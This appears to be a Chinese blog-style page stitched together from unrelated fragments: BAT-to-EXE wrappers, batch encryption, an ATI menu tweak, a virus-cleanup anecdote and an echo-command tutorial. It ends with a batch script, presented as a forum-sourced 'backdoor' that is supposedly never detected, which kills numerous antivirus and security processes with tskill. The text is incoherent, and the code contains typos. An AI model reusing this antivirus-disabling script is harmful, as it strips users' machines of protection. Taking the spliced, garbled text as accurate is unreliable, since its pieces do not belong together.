我这里所说的伪EXE就是里面是BAT批处理程序，外面只是披了层EXE的外壳，也就是网上不是有很多BAT转EXE的工具吗？就是那些工具转出来的程序。这些转换工具并不是真的把BAT编译成了EXE，因为那是不可能的……

　　我小站上有篇批处理的加密与解密文章批处理BAT的加密与解密方法，今天分析了一下它的加密原理，其实很简单的。我教大家一个简单的手工加密批处理方法，直接将以下内容复制到一个空文件里。

　　我笔记本用的是ATI显卡，刚装好的系统安装上显卡驱动，右键菜单就会显示额外的一项“Ati Catalyst Control Center”。我想很多人都是这样的情况吧？！这样一来影响倒是不大，只可能会稍微拖慢一点右键菜单的显示速度，但是不觉得太难看了吗？右键弹出的整块菜单被撑宽了很多。So…我决定把它删除掉！

　　昨天帮邻居小平家电脑杀毒。打开电脑随便看了下，感觉反应速度很慢，尤其是IE，不是一般地慢。打开任务管理器就看到logo_1.exe进程，又是它！前些天在学校帮小芳姐电脑杀毒时也是这个病毒，记得当时她电脑除了C盘以外其它盘都无法双击打开，现在小平的电脑也不例外。不过这个不难，我在DOS下删除autorun.inf和对应的病毒文件，过了会它又在根目录下自动生成。我写了几句简单的批处理，就轻松将其彻底删除而无法再自动拷贝进来。logo1这个病毒我不是很熟悉，不过我结束它的进程后，在C盘找到它的主文件，轻松删除之。我检查了它的启动项和服务，才发现已经被搞得乱七八糟，我一一将它们删除或修复。后来我才知道她的电脑上中了logo1、灰鸽子和落雪三种病毒，都是非常常见的。电脑情况是好多了，不过这个病毒这么频繁，我得去网上找下资料学习一下。

　　代码是在邪八论坛上看到的，作者是xyt。刚看到这个批处理时是有几处有些糊涂，后来也懂了。邪八上拿过来的源代码有好几处BUG，我都修改了，简单测试了下没有问题。这个批处理的功能到底是不强的，但思路非常好，有兴趣的朋友可以自行修改。一般来说，这种批处理后门是永远不被查杀的。
源代码如下：

1.Echo 命令

打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample：echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

@echo off
REM 以下批处理内容中止众多安全软件进程
tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe &
tskill TBMon.exe & tskill scan32.exe & tskill Ravmond.exe & tskill CCenter.exe &
tskill RavTask.exe & tskill Rav.exe & tskill Ravmon.exe & tskill RavmonD.exe &
tskill RavStub.exe & taskill KVXP.kxp & tskill kvMonXP.kxp & tskill KVCenter.kxp &
tskill KRegEx.exe & tskill UIHost.exe & tskill TrojDie.kxp & tskill Logo_1.exe &
tskill Rundll32.exe    //tskill是结束进程的命令，&是一个组合命令，顺序执行不管前面是否失败